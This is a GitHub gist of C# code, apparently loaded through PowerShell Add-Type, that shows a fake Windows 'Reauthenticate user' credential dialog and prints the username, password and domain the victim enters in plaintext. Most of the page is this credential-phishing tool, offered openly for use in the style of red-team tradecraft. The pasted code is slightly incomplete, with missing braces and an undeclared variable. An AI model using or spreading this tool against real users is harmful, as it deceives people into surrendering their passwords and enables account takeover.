Skip to content

Instantly share code, notes, and snippets.

Last active January 19, 2021 15:27
Show Gist options
  • Save khyberspache/e22cad35e27bb02992242fe9d20c5f14 to your computer and use it in GitHub Desktop.
Save khyberspache/e22cad35e27bb02992242fe9d20c5f14 to your computer and use it in GitHub Desktop.
Prompt a user for credentials on Windows and dump in plaintext
using System;
using System.Text;
using System.Runtime.InteropServices;
public static class CredUI
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
private struct CREDUI_INFO
public int cbSize;
public IntPtr hwndParent;
public string pszMessageText;
public string pszCaptionText;
public IntPtr hbmBanner;
[DllImport("credui.dll", CharSet = CharSet.Auto)]
private static extern bool CredUnPackAuthenticationBuffer(int dwFlags, IntPtr pAuthBuffer, uint cbAuthBuffer, StringBuilder pszUserName, ref int pcchMaxUserName, StringBuilder pszDomainName, ref int pcchMaxDomainame, StringBuilder pszPassword, ref int pcchMaxPassword);
[DllImport("credui.dll", CharSet = CharSet.Auto)]
private static extern int CredUIPromptForWindowsCredentials(ref CREDUI_INFO notUsedHere, int authError, ref uint authPackage, IntPtr InAuthBuffer, uint InAuthBufferSize, out IntPtr refOutAuthBuffer, out uint refOutAuthBufferSize, ref bool fSave, int flags);
public static void Prompt() {
credui.pszCaptionText = "Reauthenticate user";
credui.pszMessageText = "This will allow us to grab your credentials in plaintext";
credui.cbSize = Marshal.SizeOf(credui);
uint authPackage = 0;
IntPtr outCredBuffer = new IntPtr();
uint outCredSize;
bool save = false;
int result = CredUIPromptForWindowsCredentials(ref credui, 0,ref authPackage,IntPtr.Zero, 0, out outCredBuffer, out outCredSize, ref save, 1 /* Generic */);
var usernameBuf = new StringBuilder(100);
var passwordBuf = new StringBuilder(100);
var domainBuf = new StringBuilder(100);
int maxUserName = 100;
int maxDomain = 100;
int maxPassword = 100;
if (result == 0)
if (CredUnPackAuthenticationBuffer(0, outCredBuffer, outCredSize, usernameBuf, ref maxUserName, domainBuf, ref maxDomain, passwordBuf, ref maxPassword))
Console.WriteLine("Username: {0}", usernameBuf.ToString());
Console.WriteLine("Password: {0}", passwordBuf.ToString());
Console.WriteLine("Domain: {0}", domainBuf.ToString());
Add-Type -TypeDefinition $type;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment